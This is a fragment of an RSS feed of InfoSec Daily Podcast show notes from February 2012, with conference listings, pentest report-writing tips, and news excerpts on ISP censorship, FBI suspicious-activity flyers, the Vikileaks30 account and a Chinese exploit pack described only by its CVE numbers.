<p><span style="font-family:arial,helvetica,sans-serif"><b><span style="font-size: 15px;background-color: transparent;font-weight: normal;vertical-align: baseline">&hellip;</span></b> </span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-598-weekend-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3525/0/infosec-daily-podcast-episode-598.mp3" length="26931390" type="audio/mpeg" />
		<itunes:duration>0:56:06</itunes:duration>
		<itunes:subtitle>Episode 598 &#8211; Weekend Wrap-up with Dr. b0n3z 
	
	InfoSec Daily Podcast Episode 598 for February 18, 2012. &#160;Tonight&#039;s podcast is hosted by Dr Bonez, Boris Sverdlik, and Themson Mester.
	
	Guests: oncee and spridel
&#160;
Announcements[...]</itunes:subtitle>
		<itunes:summary>Episode 598 &#8211; Weekend Wrap-up with Dr. b0n3z 
	
	InfoSec Daily Podcast Episode 598 for February 18, 2012. &#160;Tonight&#039;s podcast is hosted by Dr Bonez, Boris Sverdlik, and Themson Mester.
	
	Guests: oncee and spridel
&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
Social Engineering Training
	When: March 5-9, 2012
	
	Where: Seattle, Washington
	When: July 21-24, 2012
	
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
Defcon 20
	When: July 26-29, 2012
	Where: Rio Hotel and Casino &#8211; Las Vegas, NV
	http://defcon.org/
	CFP &#38; Room reservations now open!
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
You don't have a sufficient version of Flash Player to display this animation.
Pentest Lessons
	1. When writing the report take the time to think about your target audience (who is paying your bill) Some pro-tips for reporting:

Don&#8217;t ever start a report with &#8220;As had been expected, an extensive set of gaps exist&#8221;.
Don&#8217;t ever &#160;include items in the report that you have not tested against and/or collected evidence of
Don&#8217;t ever provide a report that hasn&#8217;t been formatted properly, including a draft
Don&#8217;t ever merge findings with recommendations in the same statement
Don&#8217;t ever make comments such as &#8220;Clearly this server isn&#8217;t being maintained&#8221;


Don&#8217;t ever submit a draft without checking grammar and spelling
Don&#8217;t ever forget version control


	2. In keeping with getting to know you&#8217;re audience, you might want to research at least the points of contact at your client. Although it doesn&#8217;t happen often, on occasion you might run into a client who has significantly more experience than you do. Don&#8217;t make statements expecting them to be taken at face value, especially if you are wrong. If for some reason the PoC challenges a statement with a cash wager, asking you to prove it. Either accept the challenge, or move on. Don&#8217;t challenge them in return as this effectively lowers their perception of your expertise. 
	
	
Stories
Source: &#160;http://publicintelligence.net/fbi-suspicious-activity-reporting-flyers/
Threat Areas
	
Airport Service Providers
Beauty/Drug Suppliers
Bulk Fuel Distributors
Construction Sites
Dive/Boat Shops
Electronics Stores
Farm Supply Stores
Financial Institutions
General Aviation
General Public
Hobby Shops
Home Impro[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 597- ISP’s Not The Judge, $Coffee = Terrorist, Vikileaks, Payday, Zhi Zhu &amp; DreamHost</title>
		<link>http://www.isdpodcast.com/episode-597-isps-not-the-judge-coffee-terrorist-vikileaks-payday-zhi-zhu-dreamhost</link>
		<comments>http://www.isdpodcast.com/episode-597-isps-not-the-judge-coffee-terrorist-vikileaks-payday-zhi-zhu-dreamhost#comments</comments>
		<pubDate>Sat, 18 Feb 2012 01:47:45 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3521</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 597 for February 17, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker [...]]]></description>
			<content:encoded><![CDATA[<p><span id="internal-source-marker_0.37498523057825883" style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 597 for February 17, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Defcon 20</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 26-29, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Rio Hotel and Casino &#8211; Las Vegas, NV</span><br />
	<a href="http://defcon.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://defcon.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP &amp; Room reservations now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://www.eff.org/deeplinks/2012/02/members-uk-parliament-recommend-censoring-online-extremism"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.eff.org/deeplinks/2012/02/members-uk-parliament-recommend-censoring-online-extremism</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a </span><a href="http://www.publications.parliament.uk/pa/cm201012/cmselect/cmhaff/1446/144602.htm"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">report</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> published last week, members of the United Kingdom Parliament concluded that the Internet plays a major role in the radicalization of terrorists and called on the government to pressure Internet Service Providers in Britain and abroad to censor online speech. </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Roots of Violent Radicalisation</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> places the Internet ahead of prisons, universities, and religious establishments in propagating radical beliefs and </span><a href="http://www.parliament.uk/business/committees/committees-a-z/commons-select/home-affairs-committee/news/120206-rvr-rpt-publication/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ultimately recommends</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> that the government &ldquo;develop a code of practice for the removal of material which promotes violent extremism&rdquo; binding ISPs. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While the Terrorism Act 2006 authorizes British law enforcement agencies to order certain material to be removed from websites, lawmakers on the Home Affairs Committee stated that &ldquo;service providers themselves should be more active in monitoring the material they host.&rdquo; Their report raises serious concerns that political and religious speech will be suppressed. Security expert Peter Neumann </span><a href="http://publicintelligence.net/u-k-home-affairs-committee-encourages-internet-service-providers-to-censor-extremist-websites/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">who testified before the Committee</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> asked why websites like YouTube and Facebook can&rsquo;t be as &ldquo;effective at removing . . . extremist Islamist or extremist right-wing content&rdquo; as they are at removing sexually explicit content or copyrighted material that violates their own terms of service.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://boingboing.net/2012/02/14/fbi-says-paying-cash-for-coffe.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://boingboing.net/2012/02/14/fbi-says-paying-cash-for-coffe.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Georgia;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Using cash for small purchases like a cup of coffee, gum and other items is a good indication that a person is trying to pass for normal without leaving the kind of paper trail created using a debit or credit card for small purchases.</span></p>
<p>	<span style="font-size:15px;font-family:Georgia;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The most recent update asks coffee shop owners, baristas and other customer-service specialists to be on the lookout for the enemy who walks among us (who evidently has been reanimated from the graves of the 1950s Red Scare era of blacklisting and Communist-baiting or the KGB&#39;s constant witch hunt for capitalist sympathizers or people who resent being witch-hunted for their political beliefs).</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://news.nationalpost.com/2012/02/16/vikileaks-house-of-commons"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.nationalpost.com/2012/02/16/vikileaks-house-of-commons</span></a></p>
<p>	<span style="font-size:16px;font-family:Georgia;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An IP address connected to the Vikileaks30 Twitter account &mdash; which has been burning up the Twittersphere with claims about Public Safety Minister Vic Toews&rsquo; personal life &mdash; originates within the House of Commons, it has been revealed.</span></p>
<p>	<span style="font-size:16px;font-family:Georgia;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Vikileaks30 Twitter account surged into public prominence in the wake of the tabling of new legislation that would allow increased police surveillance of the Internet and those that use it.</span></p>
<p>	<span style="font-size:16px;font-family:Georgia;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a bid to determine the origin of the account, which posted a string of tweets online offering alleged details relating to Toews&rsquo;s divorce proceedings, the Ottawa Citizen undertook an investigation on Thursday.</span></p>
<p>	<span style="font-size:16px;font-family:Georgia;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An email was sent to the writer of the Vikileaks30 Twitter account, containing a link to a website. The website was monitored by the Citizen and only the author of Vikileaks30 had the address of the website.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.nextgov.com/nextgov/ng_20120213_7454.php"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.nextgov.com/nextgov/ng_20120213_7454.php</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Homeland Security Department nearly doubled its 2013 funding request for cybersecurity in an otherwise slimmed-down budget.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There is bipartisan support for improving computer network defenses, so the outlook may be positive for obtaining much of the proposed $769 million from Congress. The funding would go toward the National Cyber Security Division for protecting federal networks and coordinating with the private sector on safeguarding critical infrastructure systems such as utility grids.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In 2011, Homeland Security Secretary Janet Napolitano asked for $459 for the division. The Infrastructure Protection and Programs Directorate, which oversees the program and other cyber-related initiatives, also would be boosted from $888.2 million in estimated spending this year to $1.2 billion in fiscal 2013. By comparison, the Pentagon has asked for only a $200 million increase over last year&#39;s $3.2 billion cyber request.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.kahusecurity.com/2012/another-chinese-pack/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.kahusecurity.com/2012/another-chinese-pack/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A Chinese website found by</span><a href="http://twitter.com/switchingtoguns"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">@switchingtoguns</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> appears to be another Chinese exploit pack.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As mentioned in a previous</span><a href="http://www.kahusecurity.com/2012/chinese-exploit-packs/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">post</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, Chinese &ldquo;exploit packs&rdquo; are straightforward and no-nonsense. It doesn&rsquo;t use PHP, have a database, nor does it have an administration panel. It&rsquo;s a collection of HTML files that contain exploit code and minimal Javascript obfuscation. Despite its simplicity, it appears to be quite effective and it seems as though that&rsquo;s all that really matters to its creators.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The entry page contains iframes that call upon several exploit files in the single folder:</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This pack, which we&rsquo;ll call &ldquo;Zhi Zhu Pack&rdquo; (pronounced &ldquo;jii-juu&rdquo;), contains five exploits but interestingly there are no Java exploits. The first three exploits were also found in the previously announced pack we called &ldquo;</span><a href="http://www.kahusecurity.com/2012/chinese-exploit-packs/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Yang Pack</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">* IEPeers (CVE-2010-0806)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">* Flash 10.3.181.x (CVE-2011-2110)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">* Flash 10.3.183.x (CVE-2011-2140)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">* IE Time Element Memory Corruption (CVE-2011-1255)</span><br />
